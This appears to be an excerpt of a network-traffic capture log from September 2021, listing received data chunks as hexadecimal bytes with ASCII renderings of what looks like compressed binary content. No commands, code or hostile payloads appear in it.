                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC115INData Raw: 17 32 32 ee 17 47 95 dc 3e 0a fe 05 74 cc 90 a7 4a 6f a8 fc 6f ae b5 8a b9 cd 55 12 c4 ba 70 e5 e5 7e 64 e6 63 93 df d4 5e 64 72 6b 52 a9 9b 6e e5 46 51 c1 12 1d 83 79 f3 57 ee e5 6b fb 7f 3b 7f a5 4b 4e 00 c5 e8 09 f5 24 5b 22 1b 93 e7 1f 3d fa dc d2 89 c4 0a bd 18 ee 6e 2a 33 2d ef 68 0a f4 f2 41 17 a7 fd 50 d3 76 c4 03 4c d0 74 f6 09 4a fb 32 f5 0e e4 b1 70 3d aa c8 bc 8f 3c 9b be 9a 41 51 e2 81 56 4a 6c ed 51 ae 77 fc c5 47 84 48 29 06 e0 9f 4b 0a 65 5c bc a0 8b e9 5e 30 9b 4a ca f7 01 b7 5c 99 f1 d2 30 c5 c4 4e 88 46 e2 28 7b 54 8a be 38 e7 c1 ba ff 00 ab 4c 22 66 1a 1b b7 e7 2b 7e b5 82 fd 3c 15 5e 82 dc d8 da bc fb 30 f5 81 31 a6 8a 28 25 92 68 0e 4a e4 60 34 8c 8b 22 99 5a f2 71 9d 53 ce f8 5d 08 22 ec ee b1 43 8e aa 25 2b c6 45 19 45 aa 2d 5b 53
                                                                                                                                                                                                                                  Data Ascii: 22G>tJooUp~dc^drkRnFQyWk;KN$["=n*3-hAPvLtJ2p=<AQVJlQwGH)Ke\^0J\0NF({T8L"f+~<^01(%hJ`4"ZqS]"C%+EE-[S
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC117INData Raw: 10 f6 2e 18 50 b8 d7 f4 1f 92 db ea 3c 93 cf a0 69 5a 34 4b b0 66 49 36 74 ac c5 83 08 f0 63 66 8e 30 41 03 99 9d 19 ae bf 60 bb ae b8 95 04 b9 6a b5 f4 20 75 cc bf 2e 91 02 71 2e 8f 71 ff 00 f2 9b 64 d6 ad 28 23 9c 3f 58 b5 8c 4c cc 5d 0f 0a 74 dd 97 87 1e 5e 14 93 1f 70 79 1b 78 70 41 16 2c d1 22 c8 35 c7 15 d2 25 8d 71 d7 91 1c e2 c2 5a 9c e6 06 99 1e 5c b5 e9 14 b7 d5 ef 2c 52 e6 63 e3 17 9a 18 71 62 56 00 0a 8e 54 85 d0 8f c9 5a 22 85 71 76 7c d7 44 42 b1 03 95 c5 41 63 6e 7c ea fe 75 83 10 10 41 48 2e 40 24 dd 9d bd 33 af f4 23 85 8e a3 17 11 56 31 26 4b ca 1b 22 71 ee 08 ab 8f 23 b4 66 35 1f b5 42 ad b0 f0 6b f1 d0 55 72 fd fe b4 86 d1 89 3e 22 71 24 e4 28 6f ce a4 f7 ac 46 66 43 10 4c af b9 94 63 e3 cf 8d 1b f7 99 37 14 8d ec 7b 4f ee 3c 91 c1 20
                                                                                                                                                                                                                                  Data Ascii: .P<iZ4KfI6tcf0A`j u.q.qd(#?XL]t^pyxpA,"5%qZ\,RcqbVTZ"qv|DBAcn|uAH.@$3#V1&K"q#f5BkUr>"q$(oFfCLc7{O<
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC118INData Raw: 5f d0 f9 8f a8 b6 16 4e 2e 7e 36 ad a3 64 69 59 f1 49 3b 09 e3 cb 6c 0c f8 b1 73 3b c4 76 d6 09 80 50 62 01 e2 2e a4 13 4e ae 17 8b e1 11 31 0a 48 2a 95 9a 81 f1 31 b8 04 0f 43 4e 91 73 c3 71 fc 3f 16 b1 31 13 4a 41 a8 4a 55 57 2e d5 49 bb 6b af 38 7e 7a 7b d5 1e 92 cf 9b d2 f9 7f 47 7d 53 ea 4f 48 6b 73 fd be 3e a5 e8 bd 77 51 9f 2b 13 23 2f ef a1 c5 dd a3 26 4c 8f 0b a9 ee f7 26 c6 81 c5 aa f0 a0 f3 d6 6f 8b e0 65 f1 d2 cc ce 26 48 4a ab fc 40 0d 9d 8d 2a 73 0d bc 6c fe 99 f5 5e 26 49 42 ff 00 dc 7d c4 26 81 20 d5 80 d7 32 cd fc b9 ed 16 a3 17 ea 9f ac 7d 1b ae c9 e9 4f a9 38 91 e9 f9 a7 22 1c 5c 5d 73 11 64 8f 4c cb 72 8a 52 09 5e 73 ff 00 05 28 8c 82 f1 92 55 99 8e d9 0d 80 32 3c 57 d2 42 09 1c 3b a8 0b 24 3e 24 d6 c5 db 3f 78 fa 07 0f f5 41 39 08 fb
                                                                                                                                                                                                                                  Data Ascii: _N.~6diYI;ls;vPb.N1H*1CNsq?1JAJUW.Ik8~z{G}SOHks>wQ+#/&L&oe&HJ@*sl^&IB}& 2}O8"\]sdLrR^s(U2<WB;$>$?xA9
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC119INData Raw: 61 18 3e a0 7f 4e de a0 f4 1f a7 f2 3d 53 ea 7c cd 23 4b d3 b0 70 72 33 66 92 5c c8 51 9d a3 70 b1 e3 62 40 c1 64 9a 69 58 d9 2a 0a c6 8a 58 b0 03 a6 65 4a 9d 35 58 52 5c 0b 38 2c 49 b5 aa f5 cb 3d 62 9b 8b fa ba 55 e2 51 4a 4e a4 a4 30 dc 96 f3 36 be 71 bb f5 1b fa 43 fe a9 7e 89 62 fa 0b d7 3f 55 7e 92 7a af d1 fe 95 f5 df a7 b4 cf 54 fa 4f d6 63 1e 7c ed 2e 6d 3f 51 43 36 9d 24 d9 98 e8 1f 48 ca 9f 1c 77 f0 be fa 24 c6 99 81 8e 19 e4 94 84 37 52 be 8c 26 ca 21 52 e4 be 6c 0b 97 cd e8 73 b0 7e 97 8a 6e 23 fd 42 91 35 27 ee 05 91 42 c1 bf 8b 36 af 7a 54 1a 3e f0 05 ea 3f a5 9f 51 74 46 c9 ca d6 b0 b5 0c 9c 68 f1 13 5f 7d 3b 56 56 4c bd 5d 18 19 f1 b3 16 67 0b 24 fd f8 d5 ff 00 51 58 c6 79 00 0f 01 19 9c 04 ee 0d 49 93 2f 14 bc 54 a3 84 dd d8 66 da e7 ac
                                                                                                                                                                                                                                  Data Ascii: a>N=S|#Kpr3f\Qpb@diX*XeJ5XR\8,I=bUQJN06qC~b?U~zTOc|.m?QC6$Hw$7R&!Rls~n#B5'B6zT>?QtFh_};VVL]g$QXyI/Tf
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC121INData Raw: 5a e3 55 2c c2 85 82 09 07 f1 d2 d2 46 30 b9 76 26 d9 81 5c f5 a0 6f 28 9a d2 b4 61 53 d2 8a 61 7f 3d f4 b3 5e 26 44 90 cf a9 65 40 62 55 c5 d5 20 86 6e e4 6c 05 33 a1 5c 84 26 b8 a1 21 6e 7c ee e3 c7 50 51 62 94 82 68 47 90 a7 c4 10 29 2b 9a 99 83 c2 90 92 14 92 ce 49 0c ff 00 9a d6 90 0f e9 4f f1 0d 28 67 68 e6 74 41 a7 65 e4 e2 fb b9 79 23 96 66 58 e2 8c 12 c8 c8 e0 a3 9e 6f dc 48 3c 13 d3 53 41 5b 28 f9 0b 91 72 47 77 a1 85 a5 0a 29 17 29 72 77 1a 0e 94 ad 32 78 92 38 c9 a7 e7 4f 1b cd 2c 98 b3 3c 3b 5e 2b 84 88 9d 44 b1 34 88 2a 9e 36 25 39 2d c2 91 f1 5d 0c ac 29 18 40 23 20 ed c8 bd 6a 3c b3 71 58 8a 52 a4 4c 4a 9f 0a 54 41 ab 97 07 b1 66 8b 0d e8 ac d6 79 61 53 1b 36 3e a5 00 c2 cc dc 79 3b e3 ed 07 2b e3 dc 59 28 1f 91 62 fa a3 9e 70 17 21 d8 8b
                                                                                                                                                                                                                                  Data Ascii: ZU,F0v&\o(aSa=^&De@bU nl3\&!n|PQbhG)+IO(ghtAey#fXoH<SA[(rGw))rw2x8O,<;^+D4*6%9-])@# j<qXRLJTAfyaS6>y;+Y(bp!
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC122INData Raw: 8f c1 ee 2e c8 f2 65 24 6d 00 32 92 76 82 79 da be e3 40 74 df 10 87 52 4a 6e 6f a0 25 b5 1d 0f a4 2d 21 4a c3 85 bf 8b d8 0c 9e cf d7 6b 8a 5e 26 be 97 e0 b6 a5 eb 2d 3b 29 16 bd e9 8d 98 28 ee 32 c2 e2 b6 95 b0 cc f1 95 6f ce d0 77 1b f0 af d4 3f e3 e0 cb 9a 80 7c 8f 20 c0 d3 7e 51 61 f4 a4 99 bc 60 05 2c d8 55 96 ae c4 77 95 84 76 eb e9 46 93 1c 9a 74 6b 1c 7f 69 34 4a 76 4c dd c5 31 f6 fd 90 b9 f1 6a e0 51 50 41 2a 7f b0 3f 36 9d 39 e6 90 4d cd d8 e7 a0 1d f4 8f ad f0 72 92 24 03 93 00 ed fe 59 8a 54 73 ae d0 67 8f 3c 18 9a 83 e1 e7 44 da 5e 54 53 9e dc 8e cc 31 dc fc 4f 8f 32 82 8f 04 c7 96 8d bf b1 50 41 e8 c8 49 52 1c 1f db bd 85 0f 3c f2 7b 47 15 88 28 d1 c6 4e 5b a9 78 80 f5 76 b5 ea 5f 4d 47 93 99 a2 88 27 ef 40 b2 40 71 b2 31 5a 19 40 07 7b 48
                                                                                                                                                                                                                                  Data Ascii: .e$m2vy@tRJno%-!Jk^&-;)(2ow?| ~Qa`,UwvFtki4JvL1jQPA*?69Mr$YTsg<D^TS1O2PAIR<{G(N[xv_MG'@@q1Z@{H
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC123INData Raw: c2 87 5a 54 dd f4 fe e3 5b c3 14 e1 0a 72 d9 30 35 a0 7a 7e 36 d2 97 ef d2 eb 93 0c 71 b2 06 99 64 4d 89 2c 8c 1a 32 50 80 46 3e ca 5f 1e 5c f1 c5 8b e9 49 a3 ec d5 39 f5 d9 fd 3d a9 71 0e 4a 06 62 85 69 99 26 c3 b7 a3 f5 06 2d 27 a3 4b e4 f6 bb 88 4b ef 8c a9 57 02 49 10 28 03 6b 35 29 65 3b 80 ae 1a af c9 1d 4d 21 4a 28 24 06 29 04 54 66 2f ad e9 6c ad 1c e2 12 12 0b 54 27 96 5f ab b6 9a 43 f7 4f 8c c7 04 68 21 4c c9 e7 97 f4 fb c8 7e e2 30 82 bf e7 70 8a 45 b6 e5 60 6f 8b 3b 7a b0 60 84 85 1a 02 1d ef 6b fb 3e 91 4a b5 26 62 c0 72 ef 66 3b bd bb 67 02 05 bd 45 8f 2b a4 f3 ce 67 ed 89 1d 8c d2 3a b8 53 ca 04 56 57 6b a2 18 a8 4b 0b b8 6d f9 ea ab 88 35 7a 10 de 1f 3e 4e 3c fa 56 2c f8 50 12 53 84 d4 b1 b0 16 d7 f6 39 91 58 af de a4 80 45 33 3a f1 1a 28
                                                                                                                                                                                                                                  Data Ascii: ZT[r05z~6qdM,2PF>_\I9=qJbi&-'KKWI(k5)e;M!J($)Tf/lT'_COh!L~0pE`o;z`k>J&brf;gE+g:SVWkKm5z>N<V,PS9XE3:(
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC124INData Raw: e7 5c eb 41 1c cd f4 c7 a9 be a1 e8 19 99 7a 4c 9e ac f5 0f a5 71 65 ce 18 f9 38 51 cd 3b 24 25 5a ce f8 77 c6 e8 39 17 b5 91 b8 16 4f 9e bb 31 1c 32 90 a4 89 21 45 55 67 0e 47 33 4b f7 58 1c 89 5c 7a 66 a5 6b 9c b4 4b 0a 01 c7 a6 9b 6d ad 04 5e 6f a5 58 7e a7 83 3b 13 d4 7e 90 d5 35 dc ef 51 a4 d1 64 6a f8 b9 f9 72 66 68 de a4 d2 51 6b ed 73 31 0e 40 8a 39 59 c7 7a 19 a3 91 1d 58 2c 72 5a 33 29 c6 fd 4d 5c 12 7e e4 b9 92 92 85 2d 2b 4a 4f 30 58 57 30 6b 4a d0 54 c7 d1 7e 8e 78 c3 31 0b 93 35 73 10 0a 5e b9 38 ce 87 22 3c f5 a7 72 7e 90 7a d0 eb 1e 9c d0 32 fe df 57 93 23 1f 1f 23 2b 35 32 31 a4 8d d7 32 48 c2 ce 32 34 f8 25 64 12 a4 9f f0 f8 aa 64 58 e1 58 c3 b9 08 a3 af 9f 71 a0 4b 59 4c bf 10 e4 cf d3 b2 3a 47 d4 fe 9f 30 ae 58 c4 4f dc dc 69 c8 33 d3
                                                                                                                                                                                                                                  Data Ascii: \AzLqe8Q;$%Zw9O12!EUgG3KX\zfkKm^oX~;~5QdjrfhQks1@9YzX,rZ3)M\~-+JO0XW0kJT~x15s^8"<r~z2W##+5212H24%ddXXqKYL:G0XOi3
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC126INData Raw: c9 92 c6 36 43 1e e7 0c ed 11 d8 19 1c 83 ed 29 ed 20 83 c8 04 1f 24 f5 c4 ad 4b a0 14 37 b7 3a 38 ae af 11 21 a8 6f f3 fd 77 94 33 74 7d 4d 1a 6d 41 23 11 b4 8e fd a9 29 8d bb 58 78 e6 f6 b1 01 18 11 b4 7c 32 90 7c f5 d5 78 7f 95 3d 5b 21 6d 5e d1 d0 92 7f b8 b8 1f 40 33 f4 c9 34 fd 4f 44 d6 b2 36 63 e3 b9 cd c2 ef 90 b1 46 ce eb 1e 44 08 19 86 d6 59 18 b5 12 4e d6 b0 6a fa f2 9a 98 49 3c 9b e6 17 59 48 cf 3a d0 de bb 53 ce bd 23 a7 c1 80 54 b7 dc 49 21 82 86 50 41 1c 1a 00 93 c7 e3 e6 ac 75 a7 fb 60 d3 0b 5a c2 da 77 61 93 46 2d 4a 0d 42 32 a3 ee 3b e5 1f 4b 31 60 89 1f 02 36 20 b5 d1 b2 2c 73 c9 e3 fb 71 d4 c4 b0 10 40 15 62 de 4f 9b 39 3b e7 48 ea 16 d5 b6 1a 9e 95 e5 af 28 f7 13 ab 17 28 07 0a 05 ed 3e c0 0d 57 3e 68 9e 7e 78 e8 48 04 06 62 ee 68 d9
                                                                                                                                                                                                                                  Data Ascii: 6C) $K7:8!ow3t}MmA#)Xx|2|x=[!m^@34OD6cFDYNjI<YH:S#TI!PAu`ZwaF-JB2;K1`6 ,sq@bO9;H((>W>h~xHbh
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC127INData Raw: 72 2e fa 1a 74 ad 4f 90 82 8f a5 1f 4c 7d 1d 2b 65 e9 3a 8c 78 df e2 d8 79 28 70 7e e3 dd 3b 06 61 76 aa 38 14 37 9b e4 29 a1 cf 43 e2 f8 be 2c ff 00 cb 2c a8 24 39 29 b5 8e 40 7a fc 98 b3 fa 2f 03 c1 25 49 93 35 29 2b 55 31 5a af 91 39 8f ef 38 e9 6f f4 f5 f4 e2 0f 4a eb 31 f7 a4 83 b5 91 34 53 ac 81 95 a2 29 2b 26 c8 1a 5d a4 fb 50 a9 40 df 90 b5 e0 75 de 0f ea d8 fc 2b f0 9c c2 8b 58 b6 75 7f 4f 99 fd 6f fd 3f 30 29 73 b8 75 25 48 3e 24 a4 31 21 34 bb 39 15 a9 0c d1 da ff 00 47 e8 b8 99 1a 2e 23 a3 06 2b 1e 38 66 00 0d ad 1a 6d 14 53 8a dd c7 f2 38 3d 3f f7 3e e2 c9 49 a1 4e 4a 0e 49 d0 37 ce fa 46 22 6c 89 92 9a 5c e4 12 ca 77 6b 6b b3 07 7d 22 89 7f 51 3f 47 72 7d 0f f5 2e 4f a8 71 2b 8d 27 d4 51 e3 ae 5e 47 6e 39 bb 19 91 06 4b 90 4a 8e ab 1c ca 42
                                                                                                                                                                                                                                  Data Ascii: r.tOL}+e:xy(p~;av87)C,,$9)@z/%I5)+U1Z98oJ14S)+&]P@u+XuOo?0)su%H>$1!49G.#+8fmS8=?>INJI7F"l\wkk}"Q?Gr}.Oq+'Q^Gn9KJB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC128INData Raw: d8 46 b1 b0 44 ba 01 77 85 25 c6 e2 45 9f 03 f9 bb ea fa 72 84 b9 40 62 0e 05 9c 6d 70 f9 1e 71 9d e0 df 8a e2 8b 86 0f 98 a1 66 37 61 7c 9b c9 e1 77 a1 7d 2a ca d7 71 cc ba 8c 0f 24 b9 b3 92 d0 92 41 8a 39 2c 0e eb aa f2 b6 c2 40 57 dc 54 00 3a ad 44 d3 30 15 28 11 ce fd 1f cd b5 34 b4 5d 71 33 90 8a 21 81 14 c2 1b 56 ae 87 cf 2d 2b bd f5 73 42 f4 47 d3 5f 4c ea 9a a6 0e 1e 9b a5 c5 83 87 1e 2b 49 14 a5 f2 65 78 a2 ff 00 8d d4 25 b5 61 de 99 c1 11 2a 6d 63 27 24 ed 0d 5c 54 e2 a2 89 72 c1 c4 40 4b 0a d5 ef cf 9e bb 40 78 19 33 66 cc 54 d5 15 29 2f 88 06 70 05 68 d5 62 2d d1 e3 90 1e ad fa 45 f5 07 eb 86 ac b9 d8 de 9c d7 34 df 4b cd a8 61 e3 2e 4e b4 83 45 83 28 e5 c2 72 b1 9b 18 6a 8d 8c da 94 92 69 e1 f2 61 fb 54 9b 1d d0 31 0f bc 11 d6 8f 81 fa 3c e4
                                                                                                                                                                                                                                  Data Ascii: FDw%Er@bmpqf7a|w}*q$A9,@WT:D0(4]q3!V-+sBG_L+Iex%a*mc'$\Tr@K@x3fT)/phb-E4Ka.NE(rjiaT1<
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC129INData Raw: 84 fd 59 c7 d9 ea 76 1e e0 a3 1d e1 59 88 2e 64 6c 72 b6 37 0e 48 d8 c4 db 78 03 cf 27 ad 4f 0c ca 94 92 ee c0 1b e7 a5 29 f3 4a c6 3b 8d 51 95 30 a4 a4 b0 51 c8 86 70 ff 00 34 d7 df 9c df 59 b1 22 5d 5f 71 56 ed cd f7 1b 1f c6 fd f0 a4 6a 52 c8 24 c8 55 08 61 fc 7f 6e b5 1f 4e 98 a2 82 4d 5b 9b 30 a7 b1 24 67 f3 81 fa ce 15 cd a0 cb 21 66 be 99 36 56 84 87 a9 29 74 3c fd 35 d1 8c 50 69 d8 b0 c7 2f 07 fe 37 22 5e eb 8f 20 ed 46 45 15 cf 83 f9 a1 a1 92 28 95 24 d4 90 4d 5d 9d 85 83 db 33 7d ad 19 9e 20 e2 70 45 85 9b 46 3d 5d b4 f3 86 3f d2 3d 51 4f a7 34 cd c0 ba c5 8b 26 9d 99 ba 8b a6 5c 41 9a 29 51 ab 71 0e 8a 5c 0a fe 78 23 ac c7 d5 f8 72 67 ce 2a 2d 72 1e 80 8b 50 d2 fe f4 8b cf a7 a9 2b e1 e4 e0 16 15 c3 bd ad a5 7c 9a 2c 1e 01 c9 38 fa b6 2e 48 ee
                                                                                                                                                                                                                                  Data Ascii: YvY.dlr7Hx'O)J;Q0Qp4Y"]_qVjR$UanNM[0$g!f6V)t<5Pi/7"^ FE($M]3} pEF=]?=QO4&\A)Qq\x#rg*-rP+|,8.H
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC131INData Raw: 97 52 d5 53 47 74 dd 16 a5 2b e7 49 0a df fc bc 25 2f fb 97 80 07 b7 70 63 46 fa 5c ad 4c 6d 6f 50 0b f9 c1 f0 8d 2d 5b 6c fe d5 8e 5e 7d 53 d5 31 a6 f5 7e a9 8e 8a 46 12 ab 63 ec a5 61 be 1f d3 23 db 40 d0 4a 16 2c d5 5f 1d 22 7c 4b fc fa f9 c3 d2 be db 87 bf bf a3 6f ee f0 9d 7c 68 f0 bd 3c 64 94 92 e7 3b 24 c3 68 db 40 0e bb c2 95 51 b8 aa 3d a8 a0 41 af 9e 80 54 dc 4b 7f eb 6d 02 6a fa 56 a0 1d d8 43 a7 c3 21 43 22 b2 dd 7a f6 dc a3 6b d6 2e d8 9a 7e 8d 23 c4 a5 67 18 92 38 8d 0a b3 07 83 6e 39 66 3e 41 55 24 a9 b1 67 fd 3a 8a 26 39 50 37 c4 fd 09 35 ec 7b d0 c9 93 80 21 5f fa 85 7c 9a 6b d9 ab c2 9b 5d ed cf 23 13 00 d8 92 bf ea 0f dd 20 02 c4 6b f2 b4 7c d0 3e 3a 34 15 4a fb 89 ff 00 e1 af f6 74 f3 80 9f 56 c0 ab a3 e9 c5 83 18 19 8a c8 ef 4e ea d1
                                                                                                                                                                                                                                  Data Ascii: RSGt+I%/pcF\LmoP-[l^}S1~Fca#@J,_"|Ko|h<d;$h@Q=ATKmjVC!C"zk.~#g8n9f>AU$g:&9P75{!_|k]# k|>:4JtVN
                                                                                                                                                                                                                                  Data Ascii: NOSD7K22m)f,=<rS:nfZ(X"xG;[zs&>GoB?bN'g!?0US0u)[cWWUA)Uz"^D}4xd>>LokX6x7ICuN"m3scX3z4cCjdBUw
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC168INData Raw: 37 0a 48 b9 61 06 26 56 dc 58 23 ba 2a b6 ee 1a c1 f8 e9 fe 1e 8a 4b 97 48 2c 5b a5 fd 07 3e 90 9f 18 85 36 20 cc 03 96 ce 82 9e 79 e5 ac 56 9c 58 12 5c a5 67 4d b9 1a 7a 65 6f 73 47 7c 64 3c 4c a4 8b 26 9f 6b 27 f7 23 e6 fa bd 4a bf e3 74 d4 7a 54 d3 d0 d2 28 26 3e 35 3e bd fe f2 78 fb e9 cc dd 9e a6 c8 c4 58 d6 5c 5c ac 5c b4 90 bf b1 82 08 44 ae a1 45 59 5d 85 82 fe 57 91 e7 ae 84 62 49 22 f5 ab 9d 74 e9 72 e4 40 0c d5 25 58 28 dc aa c7 2f 81 01 d9 99 67 49 f5 64 2d 8c 19 a3 c5 d4 b1 b3 31 45 f1 d9 52 0d 6d 03 78 21 0f f9 4d df 93 f1 d3 a9 49 99 c1 cc 49 04 b2 4b b5 c5 29 6b bd bb 78 55 00 8e 3a 5a c9 a1 58 20 ec f4 77 fc 65 9d 63 b3 7f 4b 3d 43 26 66 1e 8d 90 8e 51 f2 b4 fc 39 5f 96 f2 a8 b6 c0 fc 38 fc 1f cf 36 3a f9 67 1f 2b 04 c9 af 70 a3 cc 83 e7
                                                                                                                                                                                                                                  Data Ascii: 7Ha&VX#*KH,[>6 yVX\gMzeosG|d<L&k'#JtzT(&>5>xX\\\DEY]WbI"tr@%X(/gId-1ERmx!MIIK)kxU:ZX wecK=C&fQ9_86:g+p
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC169INData Raw: 83 fb b9 da 84 50 b1 cf fd ba e2 54 71 12 9a 27 7a f9 6d af ee 1a 5c a3 85 38 48 23 3d 9b 4d 69 7c de ed 0b 9f 55 e6 bf 6e 68 cc c4 02 18 34 83 da c0 f9 1d ba a0 59 c7 ed 3c fc 9f 1d 1e 71 c4 90 2c ca 16 a6 56 ef 62 d4 84 d5 2c 24 82 cc 6d 7a 35 6a 5f 2d a8 f6 88 cc 5c d4 5c 08 64 59 0b 92 bb 95 76 b2 1d f6 14 2d 33 5b b1 f9 6e 54 1b 3e 3a ea 52 42 0b 01 67 7a 1f 27 a5 bd bc d3 51 21 61 ea e4 d0 d9 80 71 9e fc bd 60 83 07 51 91 23 32 b3 1f 66 dd c1 18 6f 0b b4 d9 6b 27 f6 f3 75 e4 f4 03 2d 8b 91 9b df de b1 cc 25 54 63 af 94 17 e8 1e a2 5e f2 9e e0 c7 2a 02 38 5e 4c 81 c5 2c 83 75 90 b5 fb b8 50 1b 91 c0 e8 26 68 0c 14 dd 73 af 2e ef 04 52 16 b6 c4 01 a5 2a 97 cc e4 6f 7e 76 bc 58 3f 4c 6b 30 ae 34 1d b9 a3 76 56 d8 54 45 dd 66 7f 3e cd bc 34 9e 4b 39 34
                                                                                                                                                                                                                                  Data Ascii: PTq'zm\8H#=Mi|Unh4Y<q,Vb,$mz5j_-\\dYv-3[nT>:RBgz'Q!aq`Q#2fok'u-%Tc^*8^L,uP&hs.R*o~vX?Lk04vVTEf>4K94
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC170INData Raw: 4e 53 66 06 da 02 6f 5f 3b 45 df ad 43 57 f4 34 ba 6c 0a a3 53 c1 c3 ca c4 8a 6e ef bf 2d 20 11 9c 69 4a 30 7d 8d 3c 51 c1 32 37 04 3a 48 54 55 f5 94 4b 4b e2 d2 83 65 78 88 27 3d 41 1d 29 1a 39 92 c2 e5 92 91 e1 45 1a f4 61 c8 e6 da be f7 4f bc 50 41 89 93 2c 8c ac dd d8 b2 1a 40 de d2 32 a2 88 e6 a8 d9 b5 57 7b a9 47 bf 12 25 b0 dc 0f 56 6b 0a 07 13 d2 c3 cb d3 3f 38 ac 96 12 54 73 2e 46 c2 b9 bf 2b ea fd 02 72 31 24 8e 73 b9 90 44 67 cd c6 81 96 4d ea 0c d0 c7 22 ab 1b b4 13 42 4a 59 e0 c8 a6 ac 1e 98 44 ca 02 9a 28 50 52 8f 4f 61 00 58 7c 60 81 50 4e 99 1b 7b 9c de 15 99 b0 48 35 2c 9c 48 e4 8e 3c 89 e3 92 28 c9 63 ba 54 55 57 80 ba de c6 57 00 c2 e0 0d d5 4c 39 f1 a0 e1 d6 a3 25 24 91 89 c5 40 01 e9 a6 9f 9d e3 31 c4 a1 5f 76 9f c6 f5 ab 07 ed b9 f5
                                                                                                                                                                                                                                  Data Ascii: NSfo_;ECW4lSn- iJ0}<Q27:HTUKKex'=A)9EaOPA,@2W{G%Vk?8Ts.F+r1$sDgM"BJYD(PROaX|`PN{H5,H<(cTUWWL9%$@1_v
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC171INData Raw: 7c b1 c7 97 17 69 e0 d8 4a 80 bb c0 e5 4f ee a3 56 3a 51 40 4c 9c ca 0c 18 3a ab 52 de 5d 2b d2 1e 09 4a 12 e1 a8 e4 80 37 27 3b fe e3 4b 46 48 de 0f 54 11 dd 69 de 78 da 46 2a 36 30 8e 47 0d 60 0d db d1 89 27 8e 0f 82 6f a2 71 0c 95 4a 4a 45 30 a8 79 35 5b fb bc 76 52 98 2c b3 92 a4 e1 ae c6 8d fb 7c 9f 4d 2c b9 9a 58 f3 31 c6 34 9f 64 30 30 16 50 e2 96 7d 9a 84 8e e5 c3 1b b5 32 12 83 9a 50 28 81 d4 93 33 02 0e a5 38 47 a8 81 94 ba dd d8 37 b3 76 20 7b d6 70 e3 4b a7 e7 0e c9 78 f0 64 2b 16 f6 1d d5 59 44 6e 22 1e 49 f6 b1 d9 c8 3e 07 e2 bb c2 63 c7 72 41 21 cf 3f 7f 8c 84 7b 8a 29 12 94 03 55 2c f4 f5 c9 ed 9e 71 56 f3 00 c2 d6 b3 fb 54 98 e4 64 76 94 83 dc 68 e4 70 ac 08 b3 63 79 03 71 20 2f 9b e7 ad 3c b0 d2 af a0 b6 60 bb fb d1 b5 d2 32 d3 4a 42 c8
                                                                                                                                                                                                                                  Data Ascii: |iJOV:Q@L:R]+J7';KFHTixF*60G`'oqJJE0y5[vR,|M,X14d00P}2P(38G7v {pKxd+YDn"I>crA!?{)U,qVTdvhpcyq /<`2JB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC173INData Raw: b0 f3 0f 53 ac 3e fd 27 88 75 07 59 cc 02 47 ee 22 45 b5 bf 7b ab 2e d0 4f 01 ca 5f cd 5f 9b e2 ba a7 52 ce 35 38 a3 e5 f0 05 f6 b3 e9 1a ee 11 26 48 70 71 38 ab d8 38 00 f3 63 7c cd 04 5a ff 00 48 e3 47 24 c6 29 51 e6 9b 03 6a 34 51 37 b8 32 80 7b 52 96 ad ab b9 41 04 12 b4 78 3d 00 af c7 6c c5 37 db 9d 2f 06 9c 92 12 54 ee 72 0c c6 b7 f8 f6 68 72 c0 b1 c9 93 04 8b 8c 98 ed b5 8c 68 93 17 1b bb 64 b0 6e 36 92 18 d1 f7 55 d8 f0 7a f4 d5 05 31 6c 34 f3 dd f2 df da 8c 15 42 94 18 61 a1 f4 34 c8 5c 00 5e cc 74 d7 da 40 d9 4d 91 04 c5 61 cd fd 41 14 49 18 69 00 00 a8 24 20 a0 ae 39 66 56 fe dc f4 a2 f0 92 c4 68 e7 bf 7f 78 63 12 90 aa 17 6f 5d 7d 6d a4 08 6a d8 f0 c7 03 42 d1 ab 38 fd 36 66 0a ad 1b 50 a6 de d6 db 77 12 36 9f 3c 7c 0e ba a5 cb 48 48 2d 57 6b
                                                                                                                                                                                                                                  Data Ascii: S>'uYG"E{.O__R58&Hpq88c|ZHG$)Qj4Q72{RAx=l7/Trhrhdn6Uz1l4Ba4\^t@MaAIi$ 9fVhxco]}mjB86fPw6<|HH-Wk
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC174INData Raw: ee 49 29 62 14 f7 14 86 b2 2b 69 31 b2 8a e0 5f b4 46 a0 8a 03 71 f9 eb 85 f1 06 b3 57 4b fb fe 60 53 8b 61 39 84 fc d2 da dd f3 bd a2 bb 7a fe 6f b9 81 52 10 a0 a2 4c f3 38 0a be f4 03 c9 15 6a 53 71 22 f8 e9 be 1c 13 32 9d 77 a8 ef fb 8c e7 19 30 04 cc 70 1d 60 a7 93 55 df a5 bb 1c bf fe a2 f2 9f 2b d3 11 46 9b bb 32 63 ea 79 11 44 aa 3f 68 59 23 8c b0 e0 fe ed d2 2d 7e 47 8e 2f 73 f4 7a 2a 40 b7 8a a5 b3 02 95 3e f6 d6 b1 f3 0f af 4c 69 13 68 e1 29 20 e4 6b 4b d6 cf dd e3 91 1a 86 0a 47 a1 49 14 0b 21 6c d7 d5 37 31 11 fb 1d a6 51 c4 7f 20 83 6d 7c 82 2f f8 1f 43 95 31 78 d2 1e 85 23 5f 8b 1a e5 ad 63 e1 5c 62 7f f2 a6 e1 53 09 37 a3 97 3e e7 cb 48 1b d0 b2 57 d3 1e a0 c3 d5 a1 0d 0b 69 59 da 2b 88 cb ec 6c cd 3b 15 63 5c e4 4f 22 45 c8 8a 6c 80 54 82
